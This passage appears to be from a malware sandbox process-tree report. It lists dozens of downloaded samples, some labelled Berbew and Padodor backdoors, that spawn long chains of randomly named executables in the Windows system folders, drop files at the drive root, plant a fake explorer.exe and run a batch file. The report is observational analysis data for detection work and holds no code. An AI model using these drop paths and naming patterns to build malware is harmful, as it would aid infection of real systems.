      - C:\Windows\SysWOW64\Egijmegb.exe
        
        C:\Windows\system32\Egijmegb.exe
        6⤵
        
        PID:6312
        
        C:\Windows\SysWOW64\Ekiohclf.exe
        
        C:\Windows\system32\Ekiohclf.exe
        7⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\Fnmepn32.exe
        
        C:\Windows\system32\Fnmepn32.exe
        8⤵
        
        PID:828
        
        C:\Windows\SysWOW64\Gdncmghi.exe
        
        C:\Windows\system32\Gdncmghi.exe
        9⤵
        
        PID:7188
- - C:\Users\Admin\Downloads\240919-hx4fmswflh8e717772dbd72bfd5635f9105ac8dec05e8ec3b920bca2a36540729e72a0c3bdN.exe
    C:\Users\Admin\Downloads\240919-hx4fmswflh8e717772dbd72bfd5635f9105ac8dec05e8ec3b920bca2a36540729e72a0c3bdN.exe
    3⤵
    PID:5144
- - C:\Users\Admin\Downloads\240919-h8jklsxdnl22d2c5654236ab67b24a52517bebd0f0ce94121f5f24a4f27f34b1a21e731924N.exe
    C:\Users\Admin\Downloads\240919-h8jklsxdnl22d2c5654236ab67b24a52517bebd0f0ce94121f5f24a4f27f34b1a21e731924N.exe
    3⤵
    PID:5316
  - - C:\Windows\SysWOW64\Dkifae32.exe
      C:\Windows\system32\Dkifae32.exe
      4⤵
      PID:5736
    - - C:\Windows\SysWOW64\Edfdej32.exe
        
        C:\Windows\system32\Edfdej32.exe
        5⤵
        
        PID:4744
      - C:\Windows\SysWOW64\Eejjjl32.exe
        
        C:\Windows\system32\Eejjjl32.exe
        6⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\Feocelll.exe
        
        C:\Windows\system32\Feocelll.exe
        7⤵
        
        PID:6868
        
        C:\Windows\SysWOW64\Folaiqng.exe
        
        C:\Windows\system32\Folaiqng.exe
        8⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\Gkjhoq32.exe
        
        C:\Windows\system32\Gkjhoq32.exe
        9⤵
        
        PID:7520
        
        C:\Windows\SysWOW64\Gfdfgiid.exe
        
        C:\Windows\system32\Gfdfgiid.exe
        10⤵
        
        PID:7940
        
        C:\Windows\SysWOW64\Hbpphi32.exe
        
        C:\Windows\system32\Hbpphi32.exe
        11⤵
        
        PID:6588
        
        C:\Windows\SysWOW64\Ifgldfio.exe
        
        C:\Windows\system32\Ifgldfio.exe
        12⤵
        
        PID:7576
        
        C:\Windows\SysWOW64\Joiccj32.exe
        
        C:\Windows\system32\Joiccj32.exe
        13⤵
        
        PID:8612
        
        C:\Windows\SysWOW64\Kpbfii32.exe
        
        C:\Windows\system32\Kpbfii32.exe
        14⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\Lbjelc32.exe
        
        C:\Windows\system32\Lbjelc32.exe
        15⤵
        
        PID:6768
        
        C:\Windows\SysWOW64\Medqcmki.exe
        
        C:\Windows\system32\Medqcmki.exe
        16⤵
        
        PID:9328
        
        C:\Windows\SysWOW64\Npjnhc32.exe
        
        C:\Windows\system32\Npjnhc32.exe
        17⤵
        
        PID:8524
        
        C:\Windows\SysWOW64\Plcdiabk.exe
        
        C:\Windows\system32\Plcdiabk.exe
        18⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\Bcelmhen.exe
        
        C:\Windows\system32\Bcelmhen.exe
        19⤵
        
        PID:9380
        
        C:\Windows\SysWOW64\Fkihnmhj.exe
        
        C:\Windows\system32\Fkihnmhj.exe
        20⤵
        
        PID:13132
        
        C:\Windows\SysWOW64\Nknobkje.exe
        
        C:\Windows\system32\Nknobkje.exe
        21⤵
        
        PID:11924
        
        C:\Windows\SysWOW64\Bkmmaeap.exe
        
        C:\Windows\system32\Bkmmaeap.exe
        22⤵
        
        PID:6912
        
        C:\Windows\SysWOW64\Kdkdgchl.exe
        
        C:\Windows\system32\Kdkdgchl.exe
        23⤵
        
        PID:11060
- - C:\Users\Admin\Downloads\240919-h8c3tsxdmp7e7f0bef77c85a5e01c64dad1a2f80d37035187e34f97ac1654c347ad7f46f70N.exe
    C:\Users\Admin\Downloads\240919-h8c3tsxdmp7e7f0bef77c85a5e01c64dad1a2f80d37035187e34f97ac1654c347ad7f46f70N.exe
    3⤵
    PID:5328
  - - C:\Windows\SysWOW64\Dodbbdbb.exe
      C:\Windows\system32\Dodbbdbb.exe
      4⤵
      PID:5768
    - - C:\Windows\SysWOW64\Ekpmbddq.exe
        
        C:\Windows\system32\Ekpmbddq.exe
        5⤵
        
        PID:3488
      - C:\Windows\SysWOW64\Edmjfifl.exe
        
        C:\Windows\system32\Edmjfifl.exe
        6⤵
        
        PID:6496
        
        C:\Windows\SysWOW64\Fdbdah32.exe
        
        C:\Windows\system32\Fdbdah32.exe
        7⤵
        
        PID:6904
        
        C:\Windows\SysWOW64\Fnobem32.exe
        
        C:\Windows\system32\Fnobem32.exe
        8⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\Goedpofl.exe
        
        C:\Windows\system32\Goedpofl.exe
        9⤵
        
        PID:7556
        
        C:\Windows\SysWOW64\Gkaopp32.exe
        
        C:\Windows\system32\Gkaopp32.exe
        10⤵
        
        PID:8048
        
        C:\Windows\SysWOW64\Hhihdcbp.exe
        
        C:\Windows\system32\Hhihdcbp.exe
        11⤵
        
        PID:7360
        
        C:\Windows\SysWOW64\Ifgldfio.exe
        
        C:\Windows\system32\Ifgldfio.exe
        12⤵
        
        PID:1452
        
        C:\Windows\SysWOW64\Kldmckic.exe
        
        C:\Windows\system32\Kldmckic.exe
        13⤵
        
        PID:8968
        
        C:\Windows\SysWOW64\Kfcdfbqo.exe
        
        C:\Windows\system32\Kfcdfbqo.exe
        14⤵
        
        PID:1952
- - C:\Users\Admin\Downloads\240919-h68fysxdjlead739cf56ff973808c0b173127600f4_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h68fysxdjlead739cf56ff973808c0b173127600f4_JaffaCakes118.exe
    3⤵
    PID:5704
- - C:\Users\Admin\Downloads\240919-hk1h8awdjjbc1f7d7dd47d8221676316b4eba81e38a9a80c3981c84f87507e5a54ea736ad7N.exe
    C:\Users\Admin\Downloads\240919-hk1h8awdjjbc1f7d7dd47d8221676316b4eba81e38a9a80c3981c84f87507e5a54ea736ad7N.exe
    3⤵
    PID:6424
  - - C:\Windows\SysWOW64\Fdkggg32.exe
      C:\Windows\system32\Fdkggg32.exe
      4⤵
      PID:5840
    - - C:\Windows\SysWOW64\Ghniielm.exe
        
        C:\Windows\system32\Ghniielm.exe
        5⤵
        
        PID:7784
      - C:\Windows\SysWOW64\Hgjljpkm.exe
        
        C:\Windows\system32\Hgjljpkm.exe
        6⤵
        
        PID:6400
        
        C:\Windows\SysWOW64\Inkjhi32.exe
        
        C:\Windows\system32\Inkjhi32.exe
        7⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\Ibkpcg32.exe
        
        C:\Windows\system32\Ibkpcg32.exe
        8⤵
        
        PID:7512
        
        C:\Windows\SysWOW64\Jghabl32.exe
        
        C:\Windows\system32\Jghabl32.exe
        9⤵
        
        PID:8936
        
        C:\Windows\SysWOW64\Kbghfc32.exe
        
        C:\Windows\system32\Kbghfc32.exe
        10⤵
        
        PID:7588
        
        C:\Windows\SysWOW64\Mlklkgei.exe
        
        C:\Windows\system32\Mlklkgei.exe
        11⤵
        
        PID:9284
        
        C:\Windows\SysWOW64\Nipekiep.exe
        
        C:\Windows\system32\Nipekiep.exe
        12⤵
        
        PID:7804
        
        C:\Windows\SysWOW64\Pfillg32.exe
        
        C:\Windows\system32\Pfillg32.exe
        13⤵
        
        PID:6748
        
        C:\Windows\SysWOW64\Bqfoamfj.exe
        
        C:\Windows\system32\Bqfoamfj.exe
        14⤵
        
        PID:8316
        
        C:\Windows\SysWOW64\Hnodaecc.exe
        
        C:\Windows\system32\Hnodaecc.exe
        15⤵
        
        PID:11748
        
        C:\Windows\SysWOW64\Alnmjjdb.exe
        
        C:\Windows\system32\Alnmjjdb.exe
        16⤵
        
        PID:13068
        
        C:\Windows\SysWOW64\Jgbjbp32.exe
        
        C:\Windows\system32\Jgbjbp32.exe
        17⤵
        
        PID:13056
- - C:\Users\Admin\Downloads\240919-hq6meswdjdBackdoor.Win32.Berbew.pz-5a921f1622537e5f7faed3c1e8fd43e3fafa82bcc4a706136d08401285301a39N
    C:\Users\Admin\Downloads\240919-hq6meswdjdBackdoor.Win32.Berbew.pz-5a921f1622537e5f7faed3c1e8fd43e3fafa82bcc4a706136d08401285301a39N
    3⤵
    PID:6820
  - - C:\Windows\SysWOW64\Gdbmhf32.exe
      C:\Windows\system32\Gdbmhf32.exe
      4⤵
      PID:6936
    - - C:\Windows\SysWOW64\Ifdonfka.exe
        
        C:\Windows\system32\Ifdonfka.exe
        5⤵
        
        PID:5968
      - C:\Windows\SysWOW64\Jieagojp.exe
        
        C:\Windows\system32\Jieagojp.exe
        6⤵
        
        PID:8904
        
        C:\Windows\SysWOW64\Knlleepl.exe
        
        C:\Windows\system32\Knlleepl.exe
        7⤵
        
        PID:7552
        
        C:\Windows\SysWOW64\Mhppji32.exe
        
        C:\Windows\system32\Mhppji32.exe
        8⤵
        
        PID:9304
        
        C:\Windows\SysWOW64\Nlnbgddc.exe
        
        C:\Windows\system32\Nlnbgddc.exe
        9⤵
        
        PID:8448
- - C:\Users\Admin\Downloads\240919-hnkbeawejpeacbd21b64ff72559ab5eedcd804cf3b_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hnkbeawejpeacbd21b64ff72559ab5eedcd804cf3b_JaffaCakes118.exe
    3⤵
    PID:6828
- - C:\Users\Admin\Downloads\240919-hrns1awflq835dbad3eb763155c3f8b935c58d141a70e588c1fa6986c643f8bbfd310a770fN.exe
    C:\Users\Admin\Downloads\240919-hrns1awflq835dbad3eb763155c3f8b935c58d141a70e588c1fa6986c643f8bbfd310a770fN.exe
    3⤵
    PID:5212
  - - \??\c:\1tbttn.exe
      c:\1tbttn.exe
      4⤵
      PID:7332
    - - \??\c:\vdvjd.exe
        
        c:\vdvjd.exe
        5⤵
        
        PID:4544
      - \??\c:\3dvpj.exe
        
        c:\3dvpj.exe
        6⤵
        
        PID:8540
        
        \??\c:\hbhbtt.exe
        
        c:\hbhbtt.exe
        7⤵
        
        PID:9112
        
        \??\c:\hhhnhh.exe
        
        c:\hhhnhh.exe
        8⤵
        
        PID:6320
        
        \??\c:\bbtnnn.exe
        
        c:\bbtnnn.exe
        9⤵
        
        PID:5640
        
        \??\c:\pvvpd.exe
        
        c:\pvvpd.exe
        10⤵
        
        PID:4916
        
        \??\c:\xrrlxxr.exe
        
        c:\xrrlxxr.exe
        11⤵
        
        PID:9204
        
        \??\c:\fffxxxr.exe
        
        c:\fffxxxr.exe
        12⤵
        
        PID:10888
        
        \??\c:\hnbbtb.exe
        
        c:\hnbbtb.exe
        13⤵
        
        PID:11776
        
        \??\c:\tbhtnn.exe
        
        c:\tbhtnn.exe
        14⤵
        
        PID:13988
        
        \??\c:\vvpjv.exe
        
        c:\vvpjv.exe
        15⤵
        
        PID:7532
- - C:\Users\Admin\Downloads\240919-hwhsjswgrp8e661554b10584d3a28c038ddf828a0b74d2fb5b6ee571657f4b1fb008ad381fN.exe
    C:\Users\Admin\Downloads\240919-hwhsjswgrp8e661554b10584d3a28c038ddf828a0b74d2fb5b6ee571657f4b1fb008ad381fN.exe
    3⤵
    PID:5220
  - - C:\Windows\SysWOW64\Gempgj32.exe
      C:\Windows\system32\Gempgj32.exe
      4⤵
      PID:7364
    - - C:\Windows\SysWOW64\Gkobjpin.exe
        
        C:\Windows\system32\Gkobjpin.exe
        5⤵
        
        PID:8132
      - C:\Windows\SysWOW64\Hbbmmi32.exe
        
        C:\Windows\system32\Hbbmmi32.exe
        6⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\Iickkbje.exe
        
        C:\Windows\system32\Iickkbje.exe
        7⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\Jeqbpb32.exe
        
        C:\Windows\system32\Jeqbpb32.exe
        8⤵
        
        PID:8724
        
        C:\Windows\SysWOW64\Klifnj32.exe
        
        C:\Windows\system32\Klifnj32.exe
        9⤵
        
        PID:6684
        
        C:\Windows\SysWOW64\Mbedga32.exe
        
        C:\Windows\system32\Mbedga32.exe
        10⤵
        
        PID:9316
        
        C:\Windows\SysWOW64\Npjnhc32.exe
        
        C:\Windows\system32\Npjnhc32.exe
        11⤵
        
        PID:8500
        
        C:\Windows\SysWOW64\Phhhhc32.exe
        
        C:\Windows\system32\Phhhhc32.exe
        12⤵
        
        PID:6900
        
        C:\Windows\SysWOW64\Boipmj32.exe
        
        C:\Windows\system32\Boipmj32.exe
        13⤵
        
        PID:9268
        
        C:\Windows\SysWOW64\Ehjlaaig.exe
        
        C:\Windows\system32\Ehjlaaig.exe
        14⤵
        
        PID:13072
        
        C:\Windows\SysWOW64\Kqpoakco.exe
        
        C:\Windows\system32\Kqpoakco.exe
        15⤵
        
        PID:14980
        
        C:\Windows\SysWOW64\Bhamkipi.exe
        
        C:\Windows\system32\Bhamkipi.exe
        16⤵
        
        PID:9120
        
        C:\Windows\SysWOW64\Kjjiej32.exe
        
        C:\Windows\system32\Kjjiej32.exe
        17⤵
        
        PID:18672
- - C:\Users\Admin\Downloads\240919-hxw2kawflc941ed8c614328fab4cb189d175056abf061a93c5dafdf21ea0bd40a3d4de3864N.exe
    C:\Users\Admin\Downloads\240919-hxw2kawflc941ed8c614328fab4cb189d175056abf061a93c5dafdf21ea0bd40a3d4de3864N.exe
    3⤵
    PID:5244
  - - C:\Windows\SysWOW64\Ggnlobej.exe
      C:\Windows\system32\Ggnlobej.exe
      4⤵
      PID:7480
    - - C:\Windows\SysWOW64\Gahjgj32.exe
        
        C:\Windows\system32\Gahjgj32.exe
        5⤵
        
        PID:8120
      - C:\Windows\SysWOW64\Hnfamjqg.exe
        
        C:\Windows\system32\Hnfamjqg.exe
        6⤵
        
        PID:7600
        
        C:\Windows\SysWOW64\Idjlpc32.exe
        
        C:\Windows\system32\Idjlpc32.exe
        7⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\Jiokfpph.exe
        
        C:\Windows\system32\Jiokfpph.exe
        8⤵
        
        PID:8572
        
        C:\Windows\SysWOW64\Kgknhl32.exe
        
        C:\Windows\system32\Kgknhl32.exe
        9⤵
        
        PID:9152
        
        C:\Windows\SysWOW64\Lpkiph32.exe
        
        C:\Windows\system32\Lpkiph32.exe
        10⤵
        
        PID:6864
- - C:\Users\Admin\Downloads\240919-hqpc5swern1a48fbfdf666cb0452c41f5dfde50661652be9e8fceb6dbec50a52c937b5f1e4N.exe
    C:\Users\Admin\Downloads\240919-hqpc5swern1a48fbfdf666cb0452c41f5dfde50661652be9e8fceb6dbec50a52c937b5f1e4N.exe
    3⤵
    PID:7376
- - C:\Users\Admin\Downloads\240919-h2blesxark2d12d8fa0820e20fd384962f08ac022928f75c18a0800e85eb906e078d4f090cN.exe
    C:\Users\Admin\Downloads\240919-h2blesxark2d12d8fa0820e20fd384962f08ac022928f75c18a0800e85eb906e078d4f090cN.exe
    3⤵
    PID:7388
  - - C:\Windows\services.exe
      "C:\Windows\services.exe"
      4⤵
      PID:7976
- - C:\Users\Admin\Downloads\240919-h3g5lawhkb52916a355b14379edaf8b73df77a9aa3f0d0f403dfeddfe435682744e0d3fe63.exe
    C:\Users\Admin\Downloads\240919-h3g5lawhkb52916a355b14379edaf8b73df77a9aa3f0d0f403dfeddfe435682744e0d3fe63.exe
    3⤵
    PID:7404
- - C:\Users\Admin\Downloads\240919-h1t2daxanlead362a5695e74f29d3900b7e8eba368_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h1t2daxanlead362a5695e74f29d3900b7e8eba368_JaffaCakes118.exe
    3⤵
    PID:7412
- - C:\Users\Admin\Downloads\240919-htd2kswdrfeacf4b7f8034890b3027188d63101a7a_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-htd2kswdrfeacf4b7f8034890b3027188d63101a7a_JaffaCakes118.exe
    3⤵
    PID:7420
  - - C:\Windows\SysWOW64\svchost.exe
      C:\Windows\system32\svchost.exe
      4⤵
      PID:944
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 208
        5⤵
        Program crash
        
        PID:10368
- - C:\Users\Admin\Downloads\240919-h64g1axcrpBackdoor.Win32.Padodor.SK.MTB-dfae31c187609642065b7ce5ecacf31f8ff5a92239bc6ea700d76db3fcc12548N
    C:\Users\Admin\Downloads\240919-h64g1axcrpBackdoor.Win32.Padodor.SK.MTB-dfae31c187609642065b7ce5ecacf31f8ff5a92239bc6ea700d76db3fcc12548N
    3⤵
    PID:7452
  - - C:\Windows\SysWOW64\Gahjgj32.exe
      C:\Windows\system32\Gahjgj32.exe
      4⤵
      PID:8024
    - - C:\Windows\SysWOW64\Hocqam32.exe
        
        C:\Windows\system32\Hocqam32.exe
        5⤵
        
        PID:5724
      - C:\Windows\SysWOW64\Idjlpc32.exe
        
        C:\Windows\system32\Idjlpc32.exe
        6⤵
        
        PID:7504
        
        C:\Windows\SysWOW64\Jfpojead.exe
        
        C:\Windows\system32\Jfpojead.exe
        7⤵
        
        PID:8464
        
        C:\Windows\SysWOW64\Kfjapcii.exe
        
        C:\Windows\system32\Kfjapcii.exe
        8⤵
        
        PID:9076
        
        C:\Windows\SysWOW64\Lhdqnj32.exe
        
        C:\Windows\system32\Lhdqnj32.exe
        9⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\Mojhgbdl.exe
        
        C:\Windows\system32\Mojhgbdl.exe
        10⤵
        
        PID:9228
        
        C:\Windows\SysWOW64\Nojanpej.exe
        
        C:\Windows\system32\Nojanpej.exe
        11⤵
        
        PID:3272
        
        C:\Windows\SysWOW64\Ppmcdq32.exe
        
        C:\Windows\system32\Ppmcdq32.exe
        12⤵
        
        PID:6612
        
        C:\Windows\SysWOW64\Ajjjocap.exe
        
        C:\Windows\system32\Ajjjocap.exe
        13⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\Eidbij32.exe
        
        C:\Windows\system32\Eidbij32.exe
        14⤵
        
        PID:12560
        
        C:\Windows\SysWOW64\Iqipio32.exe
        
        C:\Windows\system32\Iqipio32.exe
        15⤵
        
        PID:3328
        
        C:\Windows\SysWOW64\Oaajed32.exe
        
        C:\Windows\system32\Oaajed32.exe
        16⤵
        
        PID:9356
        
        C:\Windows\SysWOW64\Aoofle32.exe
        
        C:\Windows\system32\Aoofle32.exe
        17⤵
        
        PID:5092
- - C:\Users\Admin\Downloads\240919-h9g36sxdrq218e9c466321330d999d754655dda79bcbbe9b87305f0dd8c413a7ff6dd491d7N.exe
    C:\Users\Admin\Downloads\240919-h9g36sxdrq218e9c466321330d999d754655dda79bcbbe9b87305f0dd8c413a7ff6dd491d7N.exe
    3⤵
    PID:7748
  - - \??\c:\windows\resources\themes\explorer.exe
      c:\windows\resources\themes\explorer.exe
      4⤵
      PID:13464
- - C:\Users\Admin\Downloads\240919-hpnp8awempeacca13439ba115857f1806497a74b58_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hpnp8awempeacca13439ba115857f1806497a74b58_JaffaCakes118.exe
    3⤵
    PID:1672
- - C:\Users\Admin\Downloads\240919-hrgppawdlaf80de9b1780c03cfd79ca46b26e9accfc88b946234b19f4b7378dd45b2678c01N.exe
    C:\Users\Admin\Downloads\240919-hrgppawdlaf80de9b1780c03cfd79ca46b26e9accfc88b946234b19f4b7378dd45b2678c01N.exe
    3⤵
    PID:6156
  - - C:\Windows\SysWOW64\Jnifigpa.exe
      C:\Windows\system32\Jnifigpa.exe
      4⤵
      PID:8432
    - - C:\Windows\SysWOW64\Kbnepe32.exe
        
        C:\Windows\system32\Kbnepe32.exe
        5⤵
        
        PID:9044
      - C:\Windows\SysWOW64\Kiaqcnpb.exe
        
        C:\Windows\system32\Kiaqcnpb.exe
        6⤵
        
        PID:6636
        
        C:\Windows\SysWOW64\Mpghkf32.exe
        
        C:\Windows\system32\Mpghkf32.exe
        7⤵
        
        PID:9276
        
        C:\Windows\SysWOW64\Nipekiep.exe
        
        C:\Windows\system32\Nipekiep.exe
        8⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\Pgflqkdd.exe
        
        C:\Windows\system32\Pgflqkdd.exe
        9⤵
        
        PID:6680
        
        C:\Windows\SysWOW64\Biogppeg.exe
        
        C:\Windows\system32\Biogppeg.exe
        10⤵
        
        PID:8244
- - C:\Users\Admin\Downloads\240919-h28wxswgread21777c9591c33b563a53115f9db9461899805dfe9c73a690463074fa9f12cfN.exe
    C:\Users\Admin\Downloads\240919-h28wxswgread21777c9591c33b563a53115f9db9461899805dfe9c73a690463074fa9f12cfN.exe
    3⤵
    PID:6180
- - C:\Users\Admin\Downloads\240919-hwkl5sweph4fc8fd0487a19e945a2a5d9cbe5ecaf005c6a1d82081d0cdc59eabfbfb8486c8N.exe
    C:\Users\Admin\Downloads\240919-hwkl5sweph4fc8fd0487a19e945a2a5d9cbe5ecaf005c6a1d82081d0cdc59eabfbfb8486c8N.exe
    3⤵
    PID:6200
  - - C:\Windows\SysWOW64\Jgonlm32.exe
      C:\Windows\system32\Jgonlm32.exe
      4⤵
      PID:8692
    - - C:\Windows\SysWOW64\Khmknk32.exe
        
        C:\Windows\system32\Khmknk32.exe
        5⤵
        
        PID:5588
      - C:\Windows\SysWOW64\Lfodbqfa.exe
        
        C:\Windows\system32\Lfodbqfa.exe
        6⤵
        
        PID:9260
        
        C:\Windows\SysWOW64\Ngaionfl.exe
        
        C:\Windows\system32\Ngaionfl.exe
        7⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\Pckppl32.exe
        
        C:\Windows\system32\Pckppl32.exe
        8⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\Bfqkddfd.exe
        
        C:\Windows\system32\Bfqkddfd.exe
        9⤵
        
        PID:9004
- - C:\Users\Admin\Downloads\240919-hzvarawgjgd0af811164d3baeca7fb42738a122098de21776033548cb3427b3e6c8393e05bN.exe
    C:\Users\Admin\Downloads\240919-hzvarawgjgd0af811164d3baeca7fb42738a122098de21776033548cb3427b3e6c8393e05bN.exe
    3⤵
    PID:6216
- - C:\Users\Admin\Downloads\240919-hraalswfkr00debd46124fdbb2f695fc25f33ad9d3582a7a27faccb577881a5fb6afe01e51N.exe
    C:\Users\Admin\Downloads\240919-hraalswfkr00debd46124fdbb2f695fc25f33ad9d3582a7a27faccb577881a5fb6afe01e51N.exe
    3⤵
    PID:6236
- - C:\Users\Admin\Downloads\240919-h7wtjsxdlk0aff13dd22112e9eb4d993a31fed7c7f88a9cb2b785b0793406db16ea1230ab4N.exe
    C:\Users\Admin\Downloads\240919-h7wtjsxdlk0aff13dd22112e9eb4d993a31fed7c7f88a9cb2b785b0793406db16ea1230ab4N.exe
    3⤵
    PID:6260
  - - C:\Windows\SysWOW64\Igmagnkg.exe
      C:\Windows\system32\Igmagnkg.exe
      4⤵
      PID:8788
    - - C:\Windows\SysWOW64\Kngcje32.exe
        
        C:\Windows\system32\Kngcje32.exe
        5⤵
        
        PID:7196
      - C:\Windows\SysWOW64\Lbchba32.exe
        
        C:\Windows\system32\Lbchba32.exe
        6⤵
        
        PID:9240
        
        C:\Windows\SysWOW64\Ncfmno32.exe
        
        C:\Windows\system32\Ncfmno32.exe
        7⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\Poodpmca.exe
        
        C:\Windows\system32\Poodpmca.exe
        8⤵
        
        PID:6040
        
        C:\Windows\SysWOW64\Aimkjp32.exe
        
        C:\Windows\system32\Aimkjp32.exe
        9⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\Inmpcc32.exe
        
        C:\Windows\system32\Inmpcc32.exe
        10⤵
        
        PID:14416
        
        C:\Windows\SysWOW64\Jjoiil32.exe
        
        C:\Windows\system32\Jjoiil32.exe
        11⤵
        
        PID:18284
- - C:\Users\Admin\Downloads\240919-hk7brswdjqeaca4be488cd57107299ee54406acbae_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hk7brswdjqeaca4be488cd57107299ee54406acbae_JaffaCakes118.exe
    3⤵
    PID:5480
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\system32\bhjeaka.bat
      4⤵
      PID:6376
- - C:\Users\Admin\Downloads\240919-hwd5cswepdead0860db98d761db5047d57d69f12a4_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hwd5cswepdead0860db98d761db5047d57d69f12a4_JaffaCakes118.exe
    3⤵
    PID:8484
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8484 -s 380
      4⤵
      Program crash
      PID:10700
- - C:\Users\Admin\Downloads\240919-hxtw7swhmm7d9f6f9123a62c865774e9f268491d9250021d87cbfe8c4473cf105a71e9c33bN.exe
    C:\Users\Admin\Downloads\240919-hxtw7swhmm7d9f6f9123a62c865774e9f268491d9250021d87cbfe8c4473cf105a71e9c33bN.exe
    3⤵
    PID:8844
  - - C:\Windows\SysWOW64\Keakgpko.exe
      C:\Windows\system32\Keakgpko.exe
      4⤵
      PID:5696
    - - C:\Windows\SysWOW64\Mimpolee.exe
        
        C:\Windows\system32\Mimpolee.exe
        5⤵
        
        PID:9296
      - C:\Windows\SysWOW64\Nhbfff32.exe
        
        C:\Windows\system32\Nhbfff32.exe
        6⤵
        
        PID:6384
        
        C:\Windows\SysWOW64\Pjehmfch.exe
        
        C:\Windows\system32\Pjehmfch.exe
        7⤵
        
        PID:10040
        
        C:\Windows\SysWOW64\Bcghch32.exe
        
        C:\Windows\system32\Bcghch32.exe
        8⤵
        
        PID:11440
- - C:\Users\Admin\Downloads\240919-hw1ncswerhead0ef98e08f74f06ff3070f9a0153b2_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hw1ncswerhead0ef98e08f74f06ff3070f9a0153b2_JaffaCakes118.exe
    3⤵
    PID:7876
- - C:\Users\Admin\Downloads\240919-h5htxaxcllead5f0332179b0b2f4a68f928428a07f_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h5htxaxcllead5f0332179b0b2f4a68f928428a07f_JaffaCakes118.exe
    3⤵
    PID:5168
- - C:\Users\Admin\Downloads\240919-htsvqswgkleacfa7730063244f5b58d0de9fed2677_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-htsvqswgkleacfa7730063244f5b58d0de9fed2677_JaffaCakes118.exe
    3⤵
    PID:9416
- - C:\Users\Admin\Downloads\240919-hsddnawfpk46fd861d9e7bc82be8415cff721153d5f430732d7ca3b7b6b1978a40291ebdfdN.exe
    C:\Users\Admin\Downloads\240919-hsddnawfpk46fd861d9e7bc82be8415cff721153d5f430732d7ca3b7b6b1978a40291ebdfdN.exe
    3⤵
    PID:9428
  - - C:\Windows\SysWOW64\Nookip32.exe
      C:\Windows\system32\Nookip32.exe
      4⤵
      PID:5008
    - - C:\Windows\SysWOW64\Aihaoqlp.exe
        
        C:\Windows\system32\Aihaoqlp.exe
        5⤵
        
        PID:10952
      - C:\Windows\SysWOW64\Cmniml32.exe
        
        C:\Windows\system32\Cmniml32.exe
        6⤵
        
        PID:12036
        
        C:\Windows\SysWOW64\Gdafnpqh.exe
        
        C:\Windows\system32\Gdafnpqh.exe
        7⤵
        
        PID:14136
        
        C:\Windows\SysWOW64\Ajpqnneo.exe
        
        C:\Windows\system32\Ajpqnneo.exe
        8⤵
        
        PID:12884
- - C:\Users\Admin\Downloads\240919-htnwsawgjmeacf81cdae6384b231c2da59b4b5c904_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-htnwsawgjmeacf81cdae6384b231c2da59b4b5c904_JaffaCakes118.exe
    3⤵
    PID:9444
- - C:\Users\Admin\Downloads\240919-hjv74swamaeac961fb615a513bc979e5d0b3590e82_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hjv74swamaeac961fb615a513bc979e5d0b3590e82_JaffaCakes118.exe
    3⤵
    PID:9456
- - C:\Users\Admin\Downloads\240919-hycpbawfnaead1a0cdb38eeda7185764b7a898ea90_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hycpbawfnaead1a0cdb38eeda7185764b7a898ea90_JaffaCakes118.exe
    3⤵
    PID:9468
- - C:\Users\Admin\Downloads\240919-hme1aswdnqad491ca60a1ea8b3330a50026c7076ae7eba19762040caab98218a3d94d6575fN.exe
    C:\Users\Admin\Downloads\240919-hme1aswdnqad491ca60a1ea8b3330a50026c7076ae7eba19762040caab98218a3d94d6575fN.exe
    3⤵
    PID:9480
  - - C:\Windows\SysWOW64\Oeicejia.exe
      C:\Windows\system32\Oeicejia.exe
      4⤵
      PID:556
    - - C:\Windows\SysWOW64\Amcmpodi.exe
        
        C:\Windows\system32\Amcmpodi.exe
        5⤵
        
        PID:11916
      - C:\Windows\SysWOW64\Gnhnaf32.exe
        
        C:\Windows\system32\Gnhnaf32.exe
        6⤵
        
        PID:14056
        
        C:\Windows\SysWOW64\Coknoaic.exe
        
        C:\Windows\system32\Coknoaic.exe
        7⤵
        
        PID:7192
- - C:\Users\Admin\Downloads\240919-h4q4wsxcjja4b4d1d9040579e2e783f69ad8b9fe8243cdca7adc3819863988d677f2a2c067N.exe
    C:\Users\Admin\Downloads\240919-h4q4wsxcjja4b4d1d9040579e2e783f69ad8b9fe8243cdca7adc3819863988d677f2a2c067N.exe
    3⤵
    PID:9492
- - C:\Users\Admin\Downloads\240919-h5k92axclp264dd8a72b690ab122693af987b364e93f7cacf432290e07a397f21effff5ff2N.exe
    C:\Users\Admin\Downloads\240919-h5k92axclp264dd8a72b690ab122693af987b364e93f7cacf432290e07a397f21effff5ff2N.exe
    3⤵
    PID:9504
  - - C:\Windows\SysWOW64\Oidofh32.exe
      C:\Windows\system32\Oidofh32.exe
      4⤵
